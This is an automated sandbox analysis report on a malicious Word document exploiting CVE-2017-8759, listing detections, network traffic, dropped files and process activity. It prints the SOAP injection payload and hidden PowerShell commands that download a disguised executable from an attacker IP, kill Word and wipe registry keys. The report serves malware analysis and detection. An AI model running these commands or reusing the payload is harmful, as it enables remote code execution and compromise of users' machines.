Analysis Report

Overview

General Information

Joe Sandbox Version:	20.0.0
Analysis ID:	361151
Start time:	22:16:11
Joe Sandbox Product:	Cloud
Start date:	12.09.2017
Overall analysis duration:	0h 17m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Mal.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 (Office 2010 v14.0.4, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled VBA Instrumentation enabled JavaScript Instrumentation enabled
Detection:	MAL
Classification:	mal84.evad.expl.winDOC@23/84@1/4
HCA Information:	Successful, ratio: 80% Number of executed functions: 4 Number of non-executed functions: 9
EGA Information:	Successful, ratio: 100%
Cookbook Comments:	Sleeps bigger than 20000ms are automatically reduced to 500ms Found application associated with file extension: .doc Found Word or Excel or PowerPoint document Simulate clicks Found warning dialog Click Ok Number of clicks 0 Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): mscorsvw.exe, sppsvc.exe, OSPPSVC.EXE, svchost.exe, WmiApSrv.exe, conhost.exe, WMIADAP.exe, dllhost.exe Report size getting too big, too many NtDeviceIoControlFile calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE, csc.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, WINWORD.EXE

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	84	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior

Signature Overview

Click to jump to signature section

AV Detection:

Antivirus detection for submitted file

Show sources

Source: Mal.doc

virustotal: 10/58 detections ESET-NOD32: Win32/Exploit.CVE-2016-4117.A, TrendMicro: TROJ_CVE20178759.A, Symantec: Trojan.Mdropper, Qihoo-360: Trojan.Generic, ViRobot: RTF.S.Exploit.52911, Tencent: Hta.Trojan.Raas.Auto, Kaspersky: Exploit.MSOffice.CVE-2017-8759.a, ZoneAlarm: Exploit.MSOffice.CVE-2017-8759.a, TrendMicro-HouseCall: TROJ_CVE20178759.A, Microsoft: Exploit:Win32/CVE-2017-8759.A

Perma Link

Exploits:

Suspicious SOAP request found (potentially CVE-2017-8759)

Show sources

Source: http	HTTP: soap:address location="http://localhost?C:\Windows\System32\mshta.exe?http://91.219.236.207/img/word.db"/><soap:address location=";if (System.AppDomain.CurrentDomain.GetData(_url.Split('?')[0]) == null) {System.Diagnostics.Process.Start(_url.Split('?')[1], _url.Split('?')[2]);System.AppDomain.CurrentDomain.SetData(_url.Split('?')[0], true);} //"/> </port> </service></definitions>
Source: http	HTTP: soap:address location="http://localhost?C:\Windows\System32\mshta.exe?http://91.219.236.207/img/word.db"/><soap:address location=";if (System.AppDomain.CurrentDomain.GetData(_url.Split('?')[0]) == null) {System.Diagnostics.Process.Start(_url.Split('?')[1], _url.Split('?')[2]);System.AppDomain.CurrentDomain.SetData(_url.Split('?')[0], true);} //"/> </port> </service></definitions>

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)

Show sources

Source: OfficeUpdte-KB9748956.exe

Binary or memory string: DirectDrawCreateEx

Creates a window with clipboard capturing capabilities

Show sources

Source: C:\Windows\System32\mshta.exe

Window created: window name: CLIPBRDWNDCLASS

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe

Code function: 4x nop then push 00000058h

24_2_007CAAB8

Potential document exploit detected (performs DNS queries)

Show sources

Source: global traffic

DNS query: name: clienttemplates.content.office.net

Potential document exploit detected (performs HTTP gets)

Show sources

Source: global traffic

TCP traffic: 192.168.1.16:49193 -> 91.219.236.207:80

Potential document exploit detected (unknown TCP traffic)

Show sources

Source: global traffic

TCP traffic: 192.168.1.16:49193 -> 91.219.236.207:80

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

Networking:

Downloads files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET /img/office.png HTTP/1.1Host: 91.219.236.207Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /img/word.db HTTP/1.1Accept: /Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.219.236.207Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /img/left.jpg HTTP/1.1Host: 91.219.236.207Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /support/templates/en-us/tp01793058.cab HTTP/1.1X-Office-Version: 14.0.5128User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.5128; Pro)Host: clienttemplates.content.office.netConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /support/templates/en-us/tp01790492.cab HTTP/1.1X-Office-Version: 14.0.5128User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.5128; Pro)Host: clienttemplates.content.office.netConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /support/templates/en-us/tp01793064.cab HTTP/1.1X-Office-Version: 14.0.5128User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.5128; Pro)Host: clienttemplates.content.office.netConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /support/templates/en-us/tp01793888.cab HTTP/1.1X-Office-Version: 14.0.5128User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.5128; Pro)Host: clienttemplates.content.office.netConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /support/templates/en-us/tp01793890.cab HTTP/1.1X-Office-Version: 14.0.5128User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.5128; Pro)Host: clienttemplates.content.office.netConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /support/templates/en-us/tp01793889.cab HTTP/1.1X-Office-Version: 14.0.5128User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.5128; Pro)Host: clienttemplates.content.office.netConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /support/templates/en-us/tp01790491.cab HTTP/1.1X-Office-Version: 14.0.5128User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.5128; Pro)Host: clienttemplates.content.office.netConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /support/templates/en-us/tp01790490.cab HTTP/1.1X-Office-Version: 14.0.5128User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.5128; Pro)Host: clienttemplates.content.office.netConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /support/templates/en-us/tp01793891.cab HTTP/1.1X-Office-Version: 14.0.5128User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.5128; Pro)Host: clienttemplates.content.office.netConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /support/templates/en-us/tp01793892.cab HTTP/1.1X-Office-Version: 14.0.5128User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.5128; Pro)Host: clienttemplates.content.office.netConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /support/templates/en-us/tp01793893.cab HTTP/1.1X-Office-Version: 14.0.5128User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.5128; Pro)Host: clienttemplates.content.office.netConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /support/templates/en-us/tp01793894.cab HTTP/1.1X-Office-Version: 14.0.5128User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.5128; Pro)Host: clienttemplates.content.office.netConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /support/templates/en-us/tp01840907.cab HTTP/1.1X-Office-Version: 14.0.5128User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.5128; Pro)Host: clienttemplates.content.office.netConnection: Keep-AliveCache-Control: no-cache

Found strings which match to known social media urls

Show sources

Source: WINWORD.EXE	String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: WINWORD.EXE	String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: WINWORD.EXE	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: clienttemplates.content.office.net

Urls found in memory or binary data

Show sources

Source: powershell.exe	String found in binary or memory: file://
Source: powershell.exe	String found in binary or memory: file:///
Source: WINWORD.EXE	String found in binary or memory: file:///c:
Source: WINWORD.EXE	String found in binary or memory: file:///c:/program
Source: mshta.exe	String found in binary or memory: file:///c:/users/user/appdata/local/microsoft/windows/temporary%20internet%20files/content.ie5
Source: powershell.exe	String found in binary or memory: file:///c:/windows/assembly/gac_32/system.transactions/2.0.0.0__b77a5c561934e089/system.transactions
Source: powershell.exe	String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.powershell.commands.diagnostics/1.0.0.0__31bf3856ad36
Source: powershell.exe	String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.powershell.commands.management/1.0.0.0__31bf3856ad364
Source: powershell.exe	String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.powershell.commands.utility/1.0.0.0__31bf3856ad364e35
Source: powershell.exe	String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.powershell.consolehost/1.0.0.0__31bf3856ad364e35/micr
Source: powershell.exe	String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.powershell.security/1.0.0.0__31bf3856ad364e35/microso
Source: powershell.exe	String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.wsman.management/1.0.0.0__31bf3856ad364e35/microsoft.
Source: powershell.exe	String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.wsman.runtime/1.0.0.0__31bf3856ad364e35/microsoft.wsm
Source: powershell.exe	String found in binary or memory: file:///c:/windows/assembly/gac_msil/system.configuration.install/2.0.0.0__b03f5f7f11d50a3a/system.c
Source: powershell.exe	String found in binary or memory: file:///c:/windows/assembly/gac_msil/system.configuration/2.0.0.0__b03f5f7f11d50a3a/system.configura
Source: powershell.exe	String found in binary or memory: file:///c:/windows/assembly/gac_msil/system.directoryservices/2.0.0.0__b03f5f7f11d50a3a/system.direc
Source: powershell.exe	String found in binary or memory: file:///c:/windows/assembly/gac_msil/system.management.automation/1.0.0.0__31bf3856ad364e35/system.m
Source: powershell.exe	String found in binary or memory: file:///c:/windows/assembly/gac_msil/system.management/2.0.0.0__b03f5f7f11d50a3a/system.management.d
Source: powershell.exe	String found in binary or memory: file:///c:/windows/assembly/gac_msil/system.serviceprocess/2.0.0.0__b03f5f7f11d50a3a/system.servicep
Source: powershell.exe	String found in binary or memory: file:///c:/windows/assembly/gac_msil/system.xml/2.0.0.0__b77a5c561934e089/system.xml.dll
Source: powershell.exe	String found in binary or memory: file:///c:/windows/assembly/gac_msil/system/2.0.0.0__b77a5c561934e089/system.dll
Source: WINWORD.EXE	String found in binary or memory: file:///c:/windows/microsoft.net/framework/v2.0.50727/
Source: WINWORD.EXE, powershell.exe	String found in binary or memory: file:///c:/windows/microsoft.net/framework/v2.0.50727/mscorlib.dll
Source: WINWORD.EXE	String found in binary or memory: file:///c:/windows/system32/com/soapassembly/
Source: WINWORD.EXE	String found in binary or memory: file:///c:/windows/system32/com/soapassembly/http100914219423642070img0office4png.dllm3
Source: powershell.exe	String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/
Source: powershell.exe	String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/dr?
Source: powershell.exe	String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/en-us/microsoft.powershell.consolehost.resources/
Source: powershell.exe	String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/en-us/microsoft.powershell.security.resources/mic
Source: powershell.exe	String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/zs
Source: powershell.exe	String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0n
Source: WINWORD.EXE	String found in binary or memory: http://
Source: powershell.exe	String found in binary or memory: http://91.219.23
Source: WINWORD.EXE, powershell.exe	String found in binary or memory: http://91.219.236.207
Source: powershell.exe	String found in binary or memory: http://91.219.236.207/img/left.jp
Source: powershell.exe, word[1].db.5.dr	String found in binary or memory: http://91.219.236.207/img/left.jpg
Source: powershell.exe	String found in binary or memory: http://91.219.236.207/img/left.jpgp
Source: WINWORD.EXE	String found in binary or memory: http://91.219.236.207/img/office.png
Source: WINWORD.EXE	String found in binary or memory: http://91.219.236.207/img/office.pngicrosoft
Source: WINWORD.EXE	String found in binary or memory: http://91.219.236.207/img/office.pngp
Source: WINWORD.EXE	String found in binary or memory: http://91.219.236.207/img/wo
Source: WINWORD.EXE	String found in binary or memory: http://91.219.236.207/img/wor
Source: mshta.exe, h39sf8po.0.cs.1.dr, http100914219423642070img0office4png.dll.2.dr, Logo.cs.1.dr	String found in binary or memory: http://91.219.236.207/img/word.db
Source: mshta.exe	String found in binary or memory: http://91.219.236.207/img/word.db...ind
Source: mshta.exe	String found in binary or memory: http://91.219.236.207/img/word.db1
Source: mshta.exe	String found in binary or memory: http://91.219.236.207/img/word.dbb
Source: mshta.exe	String found in binary or memory: http://91.219.236.207/img/word.dbc:
Source: mshta.exe	String found in binary or memory: http://91.219.236.207/img/word.dbdata=c:
Source: WINWORD.EXE	String found in binary or memory: http://91.219.236.207/img/word.dbx
Source: mshta.exe	String found in binary or memory: http://91.219.236.207/img/word.dbz
Source: powershell.exe	String found in binary or memory: http://91.219.236.207h
Source: powershell.exe	String found in binary or memory: http://91.219.23p
Source: WINWORD.EXE	String found in binary or memory: http://91.219.2p
Source: WINWORD.EXE	String found in binary or memory: http://codesigninf
Source: WINWORD.EXE, cabC1FF.tmp.20.dr, cabC924.tmp.20.dr, cabCE94.tmp.20.dr, cabD6C5.tmp.20.dr, cabDE78.tmp.20.dr, cabE4E3.tmp.20.dr, cabEB4D.tmp.20.dr, cabEF95.tmp.20.dr, cabF19B.tmp.20.dr, cabF71B.tmp.20.dr, cabF78A.tmp.20.dr, tp01790490[1].cab.20.dr, tp01790491[1].cab.20.dr, tp01790492[1].cab.20.dr, tp01793058[1].cab.20.dr, tp01793064[1].cab.20.dr, tp01793888[1].cab.20.dr, tp01793889[1].cab.20.dr, tp01793890[1].cab.20.dr, tp01793891[1].cab.20.dr, tp01793892[1].cab.20.dr, tp01793893[1].cab.20.dr	String found in binary or memory: http://codesigninfo
Source: WINWORD.EXE	String found in binary or memory: http://crl.comodo.net/utn-userfirst-hardware.crl0q
Source: WINWORD.EXE	String found in binary or memory: http://crl.comodoca.com/utn-userfirst-hardware.crl06
Source: WINWORD.EXE	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: WINWORD.EXE	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: WINWORD.EXE	String found in binary or memory: http://crl.pkioverheid.nl/domorganisatielatestcrl-g2.crl0
Source: WINWORD.EXE	String found in binary or memory: http://crl.pkioverheid.nl/domovlatestcrl.crl0
Source: WINWORD.EXE	String found in binary or memory: http://crl.usertrust.com/utn-userfirst-object.crl0)
Source: WINWORD.EXE	String found in binary or memory: http://crl3.digicert.com/omniroot2025.crl
Source: WINWORD.EXE	String found in binary or memory: http://crl3.digicert.com/omniroot2025.crl0=
Source: WINWORD.EXE	String found in binary or memory: http://crt.comodoca.com/utnaddtrustserverca.crt0$
Source: WINWORD.EXE	String found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: WINWORD.EXE	String found in binary or memory: http://foo.com/foo
Source: WINWORD.EXE	String found in binary or memory: http://foo.com/foop
Source: WINWORD.EXE	String found in binary or memory: http://foo.comp
Source: powershell.exe	String found in binary or memory: http://java.com/
Source: powershell.exe	String found in binary or memory: http://java.com/help
Source: powershell.exe	String found in binary or memory: http://java.com/helphttp://java.com/help
Source: powershell.exe	String found in binary or memory: http://java.com/http://java.com
Source: WINWORD.EXE	String found in binary or memory: http://local
Source: WINWORD.EXE	String found in binary or memory: http://localhost
Source: WINWORD.EXE, h39sf8po.0.cs.1.dr, http100914219423642070img0office4png.dll.2.dr, Logo.cs.1.dr	String found in binary or memory: http://localhost?c:
Source: WINWORD.EXE	String found in binary or memory: http://localhostp
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.comodoca.com0
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.comodoca.com0%
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.comodoca.com0-
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.comodoca.com0/
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.comodoca.com05
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.digicert.com/mfewtzbnmeswstajbgurdgmcgguabbtbl0v27rvz7lbduom%2fnyb45spuewqu5z1zmijhwmys%
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.digicert.com0:
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/omniroot2025.crl
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.entrust.net03
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.entrust.net0d
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.msocsp.com0
Source: WINWORD.EXE	String found in binary or memory: http://products.office.com/
Source: WINWORD.EXE	String found in binary or memory: http://sch4
Source: WINWORD.EXE	String found in binary or memory: http://sche
Source: WINWORD.EXE	String found in binary or memory: http://schem
Source: powershell.exe	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationfilter
Source: powershell.exe	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationfilter4
Source: powershell.exe	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/wsman/selectorfilter
Source: powershell.exe	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#identifyresponse
Source: powershell.exe	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#identifyresponsep
Source: powershell.exe	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/ip
Source: WINWORD.EXE	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: WINWORD.EXE	String found in binary or memory: http://schemas.xmlsoap.org/soap/http
Source: WINWORD.EXE	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: WINWORD.EXE	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/p
Source: WINWORD.EXE	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/
Source: WINWORD.EXE	String found in binary or memory: http://schemt
Source: WINWORD.EXE	String found in binary or memory: http://schex
Source: WINWORD.EXE, b6419f5bc3093b5f22142ce454e02407.xml.20.dr, config14[1].xml.20.dr	String found in binary or memory: http://sqm.msn.com:80/sqm/office/sqmserver.dll
Source: WINWORD.EXE	String found in binary or memory: http://sqm.msn.com:80/sqm/office/sqmserver.dllu.
Source: WINWORD.EXE	String found in binary or memory: http://ts1.mm.bing.net/th?pid=8.1&id=hn.
Source: Mylar.thmx.20.dr	String found in binary or memory: http://www.apple.com/dtds/propertylist-1.0.dtd
Source: WINWORD.EXE	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: WINWORD.EXE	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: WINWORD.EXE	String found in binary or memory: http://www.mi
Source: WINWORD.EXE	String found in binary or memory: http://www.mic
Source: WINWORD.EXE	String found in binary or memory: http://www.micro
Source: WINWORD.EXE	String found in binary or memory: http://www.microso
Source: WINWORD.EXE	String found in binary or memory: http://www.mirosoft.com/pki/certs/miccodsigpca_08-31-2010.crt0
Source: WINWORD.EXE	String found in binary or memory: http://www.mirosoft.com/pki/certs/microsoftrootcert.crt0
Source: WINWORD.EXE	String found in binary or memory: http://www.public-trust.com/cgi-bin/crl/2018/cd%#t
Source: WINWORD.EXE	String found in binary or memory: http://www.public-trust.com/cgi-bin/crl/2018/cdp.crl0
Source: WINWORD.EXE	String found in binary or memory: http://www.public-trust.com/cps/omniroot.html0
Source: WINWORD.EXE	String found in binary or memory: http://www.usertrust.com1
Source: WINWORD.EXE	String found in binary or memory: https://p
Source: WINWORD.EXE, b6419f5bc3093b5f22142ce454e02407.xml.20.dr, config14[1].xml.20.dr	String found in binary or memory: https://products.office.com/
Source: WINWORD.EXE	String found in binary or memory: https://secure.comodo.com/cps0
Source: WINWORD.EXE, b6419f5bc3093b5f22142ce454e02407.xml.20.dr, config14[1].xml.20.dr	String found in binary or memory: https://ts1.mm.bing.net/th?pid=8.1&id=hn.
Source: WINWORD.EXE	String found in binary or memory: https://www.digicert.com/cps0
Source: WINWORD.EXE	String found in binary or memory: https://www.verisign.co

Downloads executable code via HTTP

Show sources

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Sep 2017 20:19:26 GMTServer: ApacheX-Frame-Options: SAMEORIGINLast-Modified: Wed, 23 Aug 2017 13:46:57 GMTAccept-Ranges: bytesContent-Length: 1383424X-XSS-Protection: 1; mode=blockKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 f6 85 bc e2 97 eb ef e2 97 eb ef e2 97 eb ef c5 51 90 ef e0 97 eb ef c5 51 85 ef f2 97 eb ef bb b4 f8 ef e9 97 eb ef e2 97 ea ef 67 97 eb ef c5 51 96 ef ee 97 eb ef c5 51 86 ef ba 97 eb ef c5 51 95 ef e3 97 eb ef c5 51 97 ef e3 97 eb ef c5 51 93 ef e3 97 eb ef 52 69 63 68 e2 97 eb ef 00 00 00 00 00 00 00 00 50 45 00 00

HTTP GET or POST without a user agent

Show sources

Source: global traffic	HTTP traffic detected: GET /img/office.png HTTP/1.1Host: 91.219.236.207Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /img/left.jpg HTTP/1.1Host: 91.219.236.207Connection: Keep-Alive

Uses a known web browser user agent for HTTP communication

Show sources

Source: global traffic

HTTP traffic detected: GET /img/word.db HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.219.236.207Connection: Keep-Alive

Downloads files with wrong headers with respect to MIME Content-Type

Show sources

Source: http

Image file has PE prefix: HTTP/1.1 200 OKDate: Tue, 12 Sep 2017 20:19:26 GMTServer: ApacheX-Frame-Options: SAMEORIGINLast-Modified: Wed, 23 Aug 2017 13:46:57 GMTAccept-Ranges: bytesContent-Length: 1383424X-XSS-Protection: 1; mode=blockKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 f6 85 bc e2 97 eb ef e2 97 eb ef e2 97 eb ef c5 51 90 ef e0 97 eb ef c5 51 85 ef f2 97 eb ef bb b4 f8 ef e9 97 eb ef e2 97 ea ef 67 97 eb ef c5 51 96 ef ee 97 eb ef c5 51 86 ef ba 97 eb ef c5 51 95 ef e3 97 eb ef c5 51 97 ef e3 97 eb ef c5 51 93 ef e3 97 eb ef 52 69 63 68 e2 97 eb ef 00 00 00 00 00 00 00 00 50 45 00 00

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2020757 ET MALWARE Windows executable sent when remote host claims to send an image 2 91.219.236.207:80 -> 192.168.1.16:49199

Stealing of Sensitive Information:

Steals Internet Explorer cookies

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\SBGGU5ON.txt
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\6SKQ9IC9.txt

Persistence and Installation Behavior:

Drops PE files

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	File created: C:\Windows\System32\com\SOAPAssembly\http100914219423642070img0office4png.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe

Drops PE files to the windows directory (C:\Windows)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

File created: C:\Windows\System32\com\SOAPAssembly\http100914219423642070img0office4png.dll

May use bcdedit to modify the Windows boot settings

Show sources

Source: WINWORD.EXE

Binary or memory string: bcdedit.exeLbc

Tries to download and execute files (via powershell)

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://91.219.236.207/img/left.jpg', '\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe');
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://91.219.236.207/img/left.jpg', '\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe');

Data Obfuscation:

Binary may include packed or encrypted code

Show sources

Source: initial sample

Static PE information: section name: .text entropy: 7.34777222612

Compiles C# or VB.Net code

Show sources

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\h39sf8po.cmdline'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\h39sf8po.cmdline'

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden taskkill /f /im winword.exe;
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden Remove-Item -Path HKCU:\Software\Microsoft\Office\16.0\Word\Resiliency -recurse;Remove-Item -Path HKCU:\Software\Microsoft\Office\14.0\Word\Resiliency -recurse;Remove-Item -Path HKCU:\Software\Microsoft\Office\15.0\Word\Resiliency -recurse;
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden Remove-Item 'C:\Users\user\Desktop\' -include http.pdb, http.dll, .cs
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://91.219.236.207/img/left.jpg', '\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe');
